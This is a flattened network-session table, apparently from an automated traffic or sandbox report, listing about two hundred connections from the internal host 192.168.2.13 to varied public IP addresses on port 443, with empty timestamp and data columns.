                                    20772192.168.2.1350658150.168.34.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20773192.168.2.1348214125.133.194.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20774192.168.2.1347446141.152.167.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20775192.168.2.1333072143.120.236.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20776192.168.2.13375889.40.0.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20777192.168.2.1345830207.173.88.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20778192.168.2.134741220.114.19.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20779192.168.2.133299049.235.131.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20780192.168.2.1340720133.36.159.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20781192.168.2.13458689.234.64.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20782192.168.2.1358378147.240.67.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20783192.168.2.133753893.213.175.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20784192.168.2.1339162160.9.135.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20785192.168.2.1340250125.160.48.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20786192.168.2.135607884.7.237.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20787192.168.2.134704865.117.195.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20788192.168.2.13451888.245.241.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20789192.168.2.1345746197.14.234.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20790192.168.2.135264697.20.22.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20791192.168.2.134517663.1.239.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20792192.168.2.134159868.205.182.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20793192.168.2.1336080114.73.103.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20794192.168.2.135099034.154.235.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20795192.168.2.1334944166.210.21.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20796192.168.2.133517494.201.162.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20797192.168.2.133532444.90.210.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20798192.168.2.135410612.75.13.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20799192.168.2.1359274204.221.96.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20800192.168.2.1354312146.38.221.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20801192.168.2.1355430173.203.151.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20802192.168.2.1354232107.97.224.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20803192.168.2.1341764138.77.23.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20804192.168.2.1337094164.88.30.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20805192.168.2.1349176185.124.85.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20806192.168.2.134935436.91.141.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20807192.168.2.134625298.110.115.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20808192.168.2.1338534133.254.209.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20809192.168.2.135261657.70.147.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20810192.168.2.1352122181.192.75.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20811192.168.2.1339128100.167.108.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20812192.168.2.1345950216.146.220.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20813192.168.2.1357104218.196.9.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20814192.168.2.1355222121.217.49.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20815192.168.2.1354846131.42.153.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20816192.168.2.1334646177.34.146.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20817192.168.2.135055469.162.242.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20818192.168.2.135766457.18.169.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20819192.168.2.1351112162.45.186.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20820192.168.2.135553292.204.30.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20821192.168.2.1335826220.4.78.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20822192.168.2.134461672.85.110.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20823192.168.2.1334508160.96.125.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20824192.168.2.1356512145.126.7.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20825192.168.2.1337158149.159.103.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20826192.168.2.13516701.83.159.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20827192.168.2.1359462119.30.11.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20828192.168.2.13383882.244.94.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20829192.168.2.135626459.152.233.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20830192.168.2.1354342156.186.131.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20831192.168.2.136092467.145.117.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20832192.168.2.135776857.102.35.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20833192.168.2.1357506179.173.16.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20834192.168.2.136085223.229.19.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20835192.168.2.135248634.237.24.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20836192.168.2.133401469.135.38.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20837192.168.2.1344898192.37.248.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20838192.168.2.133429263.46.94.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20839192.168.2.134271879.104.39.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20840192.168.2.135152625.199.250.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20841192.168.2.1334980155.25.187.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20842192.168.2.1337344125.17.218.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20843192.168.2.1344162210.8.207.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20844192.168.2.1342860102.236.107.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20845192.168.2.1358456129.134.85.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20846192.168.2.134544047.9.153.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20847192.168.2.1357944135.60.125.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20848192.168.2.1348866186.141.41.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20849192.168.2.134441431.28.100.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20850192.168.2.135046639.67.25.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20851192.168.2.133680681.214.9.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20852192.168.2.1351058154.88.111.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20853192.168.2.134664079.243.131.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20854192.168.2.1346952125.116.205.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20855192.168.2.1350226124.178.104.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20856192.168.2.1339214208.134.106.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20857192.168.2.13467922.111.64.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20858192.168.2.133449853.167.70.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20859192.168.2.1344910168.119.95.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20860192.168.2.135674613.239.167.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20861192.168.2.134244032.39.158.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20862192.168.2.1344944170.235.97.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20863192.168.2.1355892172.243.110.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20864192.168.2.1351696193.2.174.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20865192.168.2.135641625.79.222.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20866192.168.2.1338838207.26.159.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20867192.168.2.135662699.64.147.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20868192.168.2.135785635.145.94.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20869192.168.2.1337042190.227.212.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20870192.168.2.1348874201.248.9.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20871192.168.2.1337210149.166.110.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20872192.168.2.1334642206.97.45.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20873192.168.2.133660090.95.127.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20874192.168.2.134368217.107.3.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20875192.168.2.1345814223.133.122.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20876192.168.2.1336192192.37.161.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20877192.168.2.1351352173.204.141.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20878192.168.2.1352070201.111.84.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20879192.168.2.1337930193.130.71.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20880192.168.2.1341830208.27.175.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20881192.168.2.1340184159.138.32.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20882192.168.2.135054679.236.190.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20883192.168.2.1357992155.237.27.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20884192.168.2.1354008219.46.94.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20885192.168.2.134193090.90.50.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20886192.168.2.1352296151.93.82.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20887192.168.2.1350444213.12.5.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20888192.168.2.1338266134.94.85.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20889192.168.2.1336924202.106.205.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20890192.168.2.1338080126.95.66.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20891192.168.2.134527059.79.119.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20892192.168.2.135034427.117.135.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20893192.168.2.1350352146.183.255.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20894192.168.2.134916899.241.42.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20895192.168.2.1352148149.47.157.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20896192.168.2.1336042203.171.4.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20897192.168.2.135333469.214.167.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20898192.168.2.133537262.69.170.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20899192.168.2.1342878135.231.70.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20900192.168.2.1336034148.42.119.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20901192.168.2.1340056172.75.252.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20902192.168.2.1342658128.123.241.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20903192.168.2.1342970198.248.215.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20904192.168.2.134033644.68.119.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20905192.168.2.1354114206.117.94.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20906192.168.2.134737660.100.57.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20907192.168.2.1342426113.83.102.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20908192.168.2.1359728156.48.218.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20909192.168.2.135637078.180.223.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20910192.168.2.135091861.25.165.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20911192.168.2.133869223.40.53.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20912192.168.2.133551612.104.68.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20913192.168.2.1346044196.167.15.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20914192.168.2.1360260187.49.112.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20915192.168.2.1345702199.214.119.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20916192.168.2.1359218116.203.247.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20917192.168.2.1360246204.40.161.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20918192.168.2.1349336160.13.102.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20919192.168.2.133975870.97.136.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20920192.168.2.1340366111.49.70.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20921192.168.2.1336924165.235.191.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20922192.168.2.1351052139.118.174.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20923192.168.2.1348560174.125.87.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20924192.168.2.133935693.58.45.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20925192.168.2.1346620217.254.137.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20926192.168.2.1354616125.221.93.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20927192.168.2.1338248192.224.36.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20928192.168.2.1342384183.176.191.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20929192.168.2.1346354145.64.39.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20930192.168.2.1350430197.127.86.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20931192.168.2.135151237.162.218.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20932192.168.2.134389443.32.119.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20933192.168.2.1357160112.206.220.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20934192.168.2.1337868161.45.92.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20935192.168.2.1337920203.242.44.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20936192.168.2.135099041.83.221.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20937192.168.2.135588024.64.0.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20938192.168.2.1346520102.186.242.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20939192.168.2.134356857.181.11.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20940192.168.2.1359750137.138.46.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20941192.168.2.134279483.135.119.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20942192.168.2.1340322209.27.119.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20943192.168.2.1350406151.182.45.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20944192.168.2.135616066.160.97.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20945192.168.2.1338862135.113.152.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20946192.168.2.135544063.35.95.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20947192.168.2.1353510196.2.49.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20948192.168.2.1333648134.93.99.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20949192.168.2.1335862222.98.132.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20950192.168.2.1351312144.9.47.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20951192.168.2.134813297.76.5.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20952192.168.2.135687412.22.44.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20953192.168.2.1344290103.18.71.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20954192.168.2.1349878131.126.216.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20955192.168.2.134354835.248.47.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20956192.168.2.1358300198.37.16.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20957192.168.2.1340360202.226.134.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20958192.168.2.133846069.80.174.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20959192.168.2.1357280209.46.58.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20960192.168.2.133887293.167.168.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20961192.168.2.1354858188.130.170.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20962192.168.2.133575049.242.57.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20963192.168.2.134785896.215.224.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20964192.168.2.1356858202.75.191.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20965192.168.2.136006014.49.8.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20966192.168.2.135719625.211.93.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20967192.168.2.1353890211.171.222.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20968192.168.2.1355100146.26.197.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20969192.168.2.1359206135.200.15.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20970192.168.2.134546884.40.2.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20971192.168.2.133759691.24.212.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20972192.168.2.1333514153.217.143.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20973192.168.2.1334962182.10.89.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20974192.168.2.1351058124.28.64.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20975192.168.2.1349806117.58.134.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20976192.168.2.134020654.117.80.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20977192.168.2.1339936171.6.223.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20978192.168.2.1357104190.162.182.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20979192.168.2.135151450.200.79.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20980192.168.2.1353890141.200.232.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20981192.168.2.1335878110.216.147.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20982192.168.2.1341782163.181.143.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20983192.168.2.1355018165.226.68.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20984192.168.2.1335460146.82.8.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20985192.168.2.1348116201.114.58.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20986192.168.2.133962862.139.46.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20987192.168.2.1345714138.41.169.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20988192.168.2.1353072210.199.64.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20989192.168.2.135871419.235.20.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20990192.168.2.1357140141.185.165.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20991192.168.2.1333718117.10.252.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20992192.168.2.1338296146.133.62.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20993192.168.2.1340140139.12.100.250443
                                    TimestampBytes transferredDirectionData


